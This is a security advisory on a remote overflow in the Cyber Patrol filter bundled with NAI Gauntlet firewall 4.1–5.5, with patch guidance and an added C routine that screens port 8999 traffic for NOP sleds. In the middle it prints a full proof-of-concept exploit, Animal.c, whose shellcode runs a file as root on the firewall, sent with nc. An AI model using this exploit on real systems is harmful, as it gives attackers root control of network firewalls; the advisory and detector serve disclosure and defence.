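Gauntlet Firewall Remote Overflow Vulnerability

Published: 2000-05-25
Updated: 2000-05-26

Affected systems:
Network Associates Gauntlet Firewall 4.1 / 4.2 / 5.0 / 5.5
Description:
Cyber Patrol, the filtering software bundled with the NAI Gauntlet firewall (4.1/4.2/5.0/5.5),
contains an overflow that allows a remote attacker to gain root access to the firewall and
execute arbitrary system commands on it.
By default, Cyber Patrol is installed along with Gauntlet and expires after 30 days. While
Cyber Patrol is running, the Gauntlet firewall may be exposed to remote attack. Because the
filtering software is reachable from outside, the vulnerability can be exploited by external
attackers as well, not only by users on the internal network.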

<* Source: Jim Stickley
         gramble none <gramble_n@HOTMAIL.COM>
*>



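Test method:

Warning

The following program (method) may be offensive in nature and is provided for security research and teaching purposes only. Use at your own risk!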

/*
*                  Animal.c
*
*
* Remote Gauntlet BSDI proof of concept exploit.
* Garrison technologies may have found it, but I am the
* one who released it.  ;) I do not have a Sparc or I would
* write up the Solaris one too.  If you have one, please
* make the changes needed and post it.  Thanks.
*
* Script kiddies can go away, this will only execute a file
* named /bin/zz on the remote firewall.  To test this code,
* make a file named /bin/zz and chmod it to 700.
* I suggest for the test you just have the zz file make a note
* in syslog or whatever makes you happy.
*
* This code is intended for proof of concept only.
*
*
* _Gramble_
*                                             Hey BuBBles
*
*To use:
*      # Animal | nc <address> 8999
*/


#include <stdio.h>


char data[364];

main() {
    int i;
    char shelloutput[80];


/* just borrowed this execute code from another exploit */

    unsigned char shell[] =
        "\x90"
    "\xeb\x1f\x5e\x31\xc0\x89\x46\xf5\x88\x46\xfa\x89\x46\x0c\x89\x76"
    "\x08\x50\x8d\x5e\x08\x53\x56\x56\xb0\x3b\x9a\xff\xff\xff\xff\x07"
    "\xff\xe8\xdc\xff\xff\xff/bin/zz\x00";


    for(i=0;i<264;i++)
        data[i]=0x90;
    data[i]=0x30;i++;
    data[i]=0x9b;i++;
    data[i]=0xbf;i++;
    data[i]=0xef;i++;
    data[i] = 0x00;
    for (i=0; i<strlen(shell); i++)
        shelloutput[i] = shell[i];
    shelloutput[i] = 0x00;

    printf("10003.http://%s%s", data, shelloutput);


}


Recommendation:

NAI has released patches and a security advisory for each affected Gauntlet firewall version;
they are available at the following address:

http://www.tis.com/support/cyberadvisory.html
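
Until the patch is applied, traffic to the Cyber Patrol port can be screened for requests shaped like the one the PoC emits. The following is an added example, not part of the original advisory or the PoC author's code: the request layout (a decimal field, then `.http://`, then the URL) and port 8999 are inferred from the PoC's `printf` and usage line, and the thresholds and all names are hypothetical.

```c
#include <stddef.h>
#include <string.h>

/* Assumed thresholds: the PoC pads the URL with 264 filler bytes. */
#define URL_MAX_SAFE 256  /* assumption: below the 264-byte pad */
#define SLED_MIN 16       /* assumption: shortest 0x90 run to flag */

enum verdict { REQ_OK, REQ_NOT_URL, REQ_TOO_LONG, REQ_BINARY, REQ_NOP_SLED };

/* Inspect one payload captured on TCP 8999; buf need not be NUL-terminated. */
enum verdict inspect_request(const unsigned char *buf, size_t len)
{
    static const char marker[] = ".http://";
    const size_t mlen = sizeof marker - 1;
    size_t i = 0, url, run = 0, longest = 0, binary = 0;

    /* Leading decimal field ("10003" in the PoC), then ".http://". */
    while (i < len && buf[i] >= '0' && buf[i] <= '9')
        i++;
    if (i == 0 || len - i < mlen || memcmp(buf + i, marker, mlen) != 0)
        return REQ_NOT_URL;

    url = i + mlen;                 /* first byte after the scheme */
    for (i = url; i < len; i++) {
        if (buf[i] == 0x90) {
            if (++run > longest)
                longest = run;
        } else {
            run = 0;
        }
        if (buf[i] < 0x20 || buf[i] > 0x7e)
            binary++;
    }
    if (longest >= SLED_MIN)        /* most specific finding first */
        return REQ_NOP_SLED;
    if (binary > 0)
        return REQ_BINARY;
    return (len - url > URL_MAX_SAFE) ? REQ_TOO_LONG : REQ_OK;
}

int main(void)
{
    /* Constructed samples: a normal URL and one padded with 0x90. */
    unsigned char ok[] = "10003.http://www.example.com/";
    unsigned char bad[13 + 64];
    memcpy(bad, "10003.http://", 13);
    memset(bad + 13, 0x90, 64);
    return !(inspect_request(ok, sizeof ok - 1) == REQ_OK &&
             inspect_request(bad, sizeof bad) == REQ_NOP_SLED);
}
```

Any verdict other than `REQ_OK` on this port is worth logging with the source address, since a legitimate URL lookup has no reason to carry binary bytes or several hundred characters.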


This vulnerability advisory was translated and compiled by NSFOCUS. All rights reserved; do not reproduce without permission.